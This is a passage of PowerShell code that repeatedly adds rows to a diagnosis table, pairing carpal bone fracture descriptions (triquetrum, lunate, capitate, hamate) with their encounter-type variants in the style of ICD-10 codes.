nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of triquetrum [cuneiform] bone, left wrist","Displaced fracture of triquetrum [cuneiform] bone, left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of triquetrum [cuneiform] bone, left wrist","Displaced fracture of triquetrum [cuneiform] bone, left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of triquetrum [cuneiform] bone, unspecified wrist","Displaced fracture of triquetrum [cuneiform] bone, unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of triquetrum [cuneiform] bone, unspecified wrist","Displaced fracture of triquetrum [cuneiform] bone, unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of triquetrum [cuneiform] bone, unspecified wrist","Displaced fracture of triquetrum [cuneiform] bone, unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of triquetrum [cuneiform] bone, unspecified wrist","Displaced fracture of triquetrum [cuneiform] bone, unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of triquetrum [cuneiform] bone, unspecified wrist","Displaced fracture of triquetrum [cuneiform] bone, unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of triquetrum [cuneiform] bone, unspecified wrist","Displaced fracture of triquetrum [cuneiform] bone, unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of triquetrum [cuneiform] bone, unspecified wrist","Displaced fracture of triquetrum [cuneiform] bone, unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of triquetrum [cuneiform] bone, right wrist","Nondisplaced fracture of triquetrum [cuneiform] bone, right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of triquetrum [cuneiform] bone, right wrist","Nondisplaced fracture of triquetrum [cuneiform] bone, right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of triquetrum [cuneiform] bone, right wrist","Nondisplaced fracture of triquetrum [cuneiform] bone, right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of triquetrum [cuneiform] bone, right wrist","Nondisplaced fracture of triquetrum [cuneiform] bone, right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of triquetrum [cuneiform] bone, right wrist","Nondisplaced fracture of triquetrum [cuneiform] bone, right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of triquetrum [cuneiform] bone, right wrist","Nondisplaced fracture of triquetrum [cuneiform] bone, right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of triquetrum [cuneiform] bone, right wrist","Nondisplaced fracture of triquetrum [cuneiform] bone, right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of triquetrum [cuneiform] bone, left wrist","Nondisplaced fracture of triquetrum [cuneiform] bone, left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of triquetrum [cuneiform] bone, left wrist","Nondisplaced fracture of triquetrum [cuneiform] bone, left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of triquetrum [cuneiform] bone, left wrist","Nondisplaced fracture of triquetrum [cuneiform] bone, left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of triquetrum [cuneiform] bone, left wrist","Nondisplaced fracture of triquetrum [cuneiform] bone, left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of triquetrum [cuneiform] bone, left wrist","Nondisplaced fracture of triquetrum [cuneiform] bone, left wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of triquetrum [cuneiform] bone, left wrist","Nondisplaced fracture of triquetrum [cuneiform] bone, left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of triquetrum [cuneiform] bone, left wrist","Nondisplaced fracture of triquetrum [cuneiform] bone, left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of triquetrum [cuneiform] bone, unspecified wrist","Nondisplaced fracture of triquetrum [cuneiform] bone, unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of triquetrum [cuneiform] bone, unspecified wrist","Nondisplaced fracture of triquetrum [cuneiform] bone, unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of triquetrum [cuneiform] bone, unspecified wrist","Nondisplaced fracture of triquetrum [cuneiform] bone, unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of triquetrum [cuneiform] bone, unspecified wrist","Nondisplaced fracture of triquetrum [cuneiform] bone, unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of triquetrum [cuneiform] bone, unspecified wrist","Nondisplaced fracture of triquetrum [cuneiform] bone, unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of triquetrum [cuneiform] bone, unspecified wrist","Nondisplaced fracture of triquetrum [cuneiform] bone, unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of triquetrum [cuneiform] bone, unspecified wrist","Nondisplaced fracture of triquetrum [cuneiform] bone, unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lunate [semilunar], right wrist","Displaced fracture of lunate [semilunar], right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lunate [semilunar], right wrist","Displaced fracture of lunate [semilunar], right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lunate [semilunar], right wrist","Displaced fracture of lunate [semilunar], right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lunate [semilunar], right wrist","Displaced fracture of lunate [semilunar], right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lunate [semilunar], right wrist","Displaced fracture of lunate [semilunar], right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lunate [semilunar], right wrist","Displaced fracture of lunate [semilunar], right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lunate [semilunar], right wrist","Displaced fracture of lunate [semilunar], right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lunate [semilunar], left wrist","Displaced fracture of lunate [semilunar], left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lunate [semilunar], left wrist","Displaced fracture of lunate [semilunar], left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lunate [semilunar], left wrist","Displaced fracture of lunate [semilunar], left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lunate [semilunar], left wrist","Displaced fracture of lunate [semilunar], left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lunate [semilunar], left wrist","Displaced fracture of lunate [semilunar], left wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lunate [semilunar], left wrist","Displaced fracture of lunate [semilunar], left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lunate [semilunar], left wrist","Displaced fracture of lunate [semilunar], left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lunate [semilunar], unspecified wrist","Displaced fracture of lunate [semilunar], unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lunate [semilunar], unspecified wrist","Displaced fracture of lunate [semilunar], unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lunate [semilunar], unspecified wrist","Displaced fracture of lunate [semilunar], unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lunate [semilunar], unspecified wrist","Displaced fracture of lunate [semilunar], unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lunate [semilunar], unspecified wrist","Displaced fracture of lunate [semilunar], unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lunate [semilunar], unspecified wrist","Displaced fracture of lunate [semilunar], unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lunate [semilunar], unspecified wrist","Displaced fracture of lunate [semilunar], unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lunate [semilunar], right wrist","Nondisplaced fracture of lunate [semilunar], right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lunate [semilunar], right wrist","Nondisplaced fracture of lunate [semilunar], right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lunate [semilunar], right wrist","Nondisplaced fracture of lunate [semilunar], right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lunate [semilunar], right wrist","Nondisplaced fracture of lunate [semilunar], right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lunate [semilunar], right wrist","Nondisplaced fracture of lunate [semilunar], right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lunate [semilunar], right wrist","Nondisplaced fracture of lunate [semilunar], right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lunate [semilunar], right wrist","Nondisplaced fracture of lunate [semilunar], right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lunate [semilunar], left wrist","Nondisplaced fracture of lunate [semilunar], left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lunate [semilunar], left wrist","Nondisplaced fracture of lunate [semilunar], left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lunate [semilunar], left wrist","Nondisplaced fracture of lunate [semilunar], left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lunate [semilunar], left wrist","Nondisplaced fracture of lunate [semilunar], left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lunate [semilunar], left wrist","Nondisplaced fracture of lunate [semilunar], left wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lunate [semilunar], left wrist","Nondisplaced fracture of lunate [semilunar], left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lunate [semilunar], left wrist","Nondisplaced fracture of lunate [semilunar], left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lunate [semilunar], unspecified wrist","Nondisplaced fracture of lunate [semilunar], unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lunate [semilunar], unspecified wrist","Nondisplaced fracture of lunate [semilunar], unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lunate [semilunar], unspecified wrist","Nondisplaced fracture of lunate [semilunar], unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lunate [semilunar], unspecified wrist","Nondisplaced fracture of lunate [semilunar], unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lunate [semilunar], unspecified wrist","Nondisplaced fracture of lunate [semilunar], unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lunate [semilunar], unspecified wrist","Nondisplaced fracture of lunate [semilunar], unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lunate [semilunar], unspecified wrist","Nondisplaced fracture of lunate [semilunar], unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of capitate [os magnum] bone, right wrist","Displaced fracture of capitate [os magnum] bone, right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of capitate [os magnum] bone, right wrist","Displaced fracture of capitate [os magnum] bone, right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of capitate [os magnum] bone, right wrist","Displaced fracture of capitate [os magnum] bone, right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of capitate [os magnum] bone, right wrist","Displaced fracture of capitate [os magnum] bone, right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of capitate [os magnum] bone, right wrist","Displaced fracture of capitate [os magnum] bone, right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of capitate [os magnum] bone, right wrist","Displaced fracture of capitate [os magnum] bone, right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of capitate [os magnum] bone, right wrist","Displaced fracture of capitate [os magnum] bone, right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of capitate [os magnum] bone, left wrist","Displaced fracture of capitate [os magnum] bone, left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of capitate [os magnum] bone, left wrist","Displaced fracture of capitate [os magnum] bone, left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of capitate [os magnum] bone, left wrist","Displaced fracture of capitate [os magnum] bone, left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of capitate [os magnum] bone, left wrist","Displaced fracture of capitate [os magnum] bone, left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of capitate [os magnum] bone, left wrist","Displaced fracture of capitate [os magnum] bone, left wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of capitate [os magnum] bone, left wrist","Displaced fracture of capitate [os magnum] bone, left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of capitate [os magnum] bone, left wrist","Displaced fracture of capitate [os magnum] bone, left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of capitate [os magnum] bone, unspecified wrist","Displaced fracture of capitate [os magnum] bone, unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of capitate [os magnum] bone, unspecified wrist","Displaced fracture of capitate [os magnum] bone, unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of capitate [os magnum] bone, unspecified wrist","Displaced fracture of capitate [os magnum] bone, unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of capitate [os magnum] bone, unspecified wrist","Displaced fracture of capitate [os magnum] bone, unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of capitate [os magnum] bone, unspecified wrist","Displaced fracture of capitate [os magnum] bone, unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of capitate [os magnum] bone, unspecified wrist","Displaced fracture of capitate [os magnum] bone, unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of capitate [os magnum] bone, unspecified wrist","Displaced fracture of capitate [os magnum] bone, unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of capitate [os magnum] bone, right wrist","Nondisplaced fracture of capitate [os magnum] bone, right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of capitate [os magnum] bone, right wrist","Nondisplaced fracture of capitate [os magnum] bone, right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of capitate [os magnum] bone, right wrist","Nondisplaced fracture of capitate [os magnum] bone, right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of capitate [os magnum] bone, right wrist","Nondisplaced fracture of capitate [os magnum] bone, right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of capitate [os magnum] bone, right wrist","Nondisplaced fracture of capitate [os magnum] bone, right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of capitate [os magnum] bone, right wrist","Nondisplaced fracture of capitate [os magnum] bone, right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of capitate [os magnum] bone, right wrist","Nondisplaced fracture of capitate [os magnum] bone, right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of capitate [os magnum] bone, left wrist","Nondisplaced fracture of capitate [os magnum] bone, left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of capitate [os magnum] bone, left wrist","Nondisplaced fracture of capitate [os magnum] bone, left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of capitate [os magnum] bone, left wrist","Nondisplaced fracture of capitate [os magnum] bone, left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of capitate [os magnum] bone, left wrist","Nondisplaced fracture of capitate [os magnum] bone, left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of capitate [os magnum] bone, left wrist","Nondisplaced fracture of capitate [os magnum] bone, left wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of capitate [os magnum] bone, left wrist","Nondisplaced fracture of capitate [os magnum] bone, left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of capitate [os magnum] bone, left wrist","Nondisplaced fracture of capitate [os magnum] bone, left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of capitate [os magnum] bone, unspecified wrist","Nondisplaced fracture of capitate [os magnum] bone, unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of capitate [os magnum] bone, unspecified wrist","Nondisplaced fracture of capitate [os magnum] bone, unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of capitate [os magnum] bone, unspecified wrist","Nondisplaced fracture of capitate [os magnum] bone, unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of capitate [os magnum] bone, unspecified wrist","Nondisplaced fracture of capitate [os magnum] bone, unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of capitate [os magnum] bone, unspecified wrist","Nondisplaced fracture of capitate [os magnum] bone, unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of capitate [os magnum] bone, unspecified wrist","Nondisplaced fracture of capitate [os magnum] bone, unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of capitate [os magnum] bone, unspecified wrist","Nondisplaced fracture of capitate [os magnum] bone, unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of hamate [unciform] bone, right wrist","Displaced fracture of body of hamate [unciform] bone, right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of hamate [unciform] bone, right wrist","Displaced fracture of body of hamate [unciform] bone, right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of hamate [unciform] bone, right wrist","Displaced fracture of body of hamate [unciform] bone, right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of hamate [unciform] bone, right wrist","Displaced fracture of body of hamate [unciform] bone, right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of hamate [unciform] bone, right wrist","Displaced fracture of body of hamate [unciform] bone, right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of hamate [unciform] bone, right wrist","Displaced fracture of body of hamate [unciform] bone, right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of hamate [unciform] bone, right wrist","Displaced fracture of body of hamate [unciform] bone, right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of hamate [unciform] bone, left wrist","Displaced fracture of body of hamate [unciform] bone, left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of hamate [unciform] bone, left wrist","Displaced fracture of body of hamate [unciform] bone, left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of hamate [unciform] bone, left wrist","Displaced fracture of body of hamate [unciform] bone, left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of hamate [unciform] bone, left wrist","Displaced fracture of body of hamate [unciform] bone, left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of hamate [unciform] bone, left wrist","Displaced fracture of body of hamate [unciform] bone, left wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of hamate [unciform] bone, left wrist","Displaced fracture of body of hamate [unciform] bone, left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of hamate [unciform] bone, left wrist","Displaced fracture of body of hamate [unciform] bone, left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of hamate [unciform] bone, unspecified wrist","Displaced fracture of body of hamate [unciform] bone, unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of hamate [unciform] bone, unspecified wrist","Displaced fracture of body of hamate [unciform] bone, unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of hamate [unciform] bone, unspecified wrist","Displaced fracture of body of hamate [unciform] bone, unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of hamate [unciform] bone, unspecified wrist","Displaced fracture of body of hamate [unciform] bone, unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of hamate [unciform] bone, unspecified wrist","Displaced fracture of body of hamate [unciform] bone, unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of hamate [unciform] bone, unspecified wrist","Displaced fracture of body of hamate [unciform] bone, unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of hamate [unciform] bone, unspecified wrist","Displaced fracture of body of hamate [unciform] bone, unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of hamate [unciform] bone, right wrist","Nondisplaced fracture of body of hamate [unciform] bone, right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of hamate [unciform] bone, right wrist","Nondisplaced fracture of body of hamate [unciform] bone, right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of hamate [unciform] bone, right wrist","Nondisplaced fracture of body of hamate [unciform] bone, right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of hamate [unciform] bone, right wrist","Nondisplaced fracture of body of hamate [unciform] bone, right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of hamate [unciform] bone, right wrist","Nondisplaced fracture of body of hamate [unciform] bone, right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of hamate [unciform] bone, right wrist","Nondisplaced fracture of body of hamate [unciform] bone, right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of hamate [unciform] bone, right wrist","Nondisplaced fracture of body of hamate [unciform] bone, right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of hamate [unciform] bone, left wrist","Nondisplaced fracture of body of hamate [unciform] bone, left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of hamate [unciform] bone, left wrist","Nondisplaced fracture of body of hamate [unciform] bone, left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of hamate [unciform] bone, left wrist","Nondisplaced fracture of body of hamate [unciform] bone, left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of hamate [unciform] bone, left wrist","Nondisplaced fracture of body of hamate [unciform] bone, left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of hamate [unciform] bone, left wrist","Nondisplaced fracture of body of hamate [unciform] bone, left wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of hamate [unciform] bone, left wrist","Nondisplaced fracture of body of hamate [unciform] bone, left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of hamate [unciform] bone, left wrist","Nondisplaced fracture of body of hamate [unciform] bone, left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of hamate [unciform] bone, unspecified wrist","Nondisplaced fracture of body of hamate [unciform] bone, unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of hamate [unciform] bone, unspecified wrist","Nondisplaced fracture of body of hamate [unciform] bone, unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of hamate [unciform] bone, unspecified wrist","Nondisplaced fracture of body of hamate [unciform] bone, unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of hamate [unciform] bone, unspecified wrist","Nondisplaced fracture of body of hamate [unciform] bone, unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of hamate [unciform] bone, unspecified wrist","Nondisplaced fracture of body of hamate [unciform] bone, unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of hamate [unciform] bone, unspecified wrist","Nondisplaced fracture of body of hamate [unciform] bone, unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of hamate [unciform] bone, unspecified wrist","Nondisplaced fracture of body of hamate [unciform] bone, unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of hook process of hamate [unciform] bone, right wrist","Displaced fracture of hook process of hamate [unciform] bone, right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of hook process of hamate [unciform] bone, right wrist","Displaced fracture of hook process of hamate [unciform] bone, right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of hook process of hamate [unciform] bone, right wrist","Displaced fracture of hook process of hamate [unciform] bone, right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of hook process of hamate [unciform] bone, right wrist","Displaced fracture of hook process of hamate [unciform] bone, right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of hook process of hamate [unciform] bone, right wrist","Displaced fracture of hook process of hamate [unciform] bone, right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of hook process of hamate [unciform] bone, right wrist","Displaced fracture of hook process of hamate [unciform] bone, right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of hook process of hamate [unciform] bone, right wrist","Displaced fracture of hook process of hamate [unciform] bone, right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of hook process of hamate [unciform] bone, left wrist","Displaced fracture of hook process of hamate [unciform] bone, left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of hook process of hamate [unciform] bone, left wrist","Displaced fracture of hook process of hamate [unciform] bone, left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of hook process of hamate [unciform] bone, left wrist","Displaced fracture of hook process of hamate [unciform] bone, left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of hook process of hamate [unciform] bone, left wrist","Displaced fracture of hook process of hamate [unciform] bone, left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of hook process of hamate [unciform] bone, left wrist","Displaced fracture of hook process of hamate [unciform] bone, left wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of hook 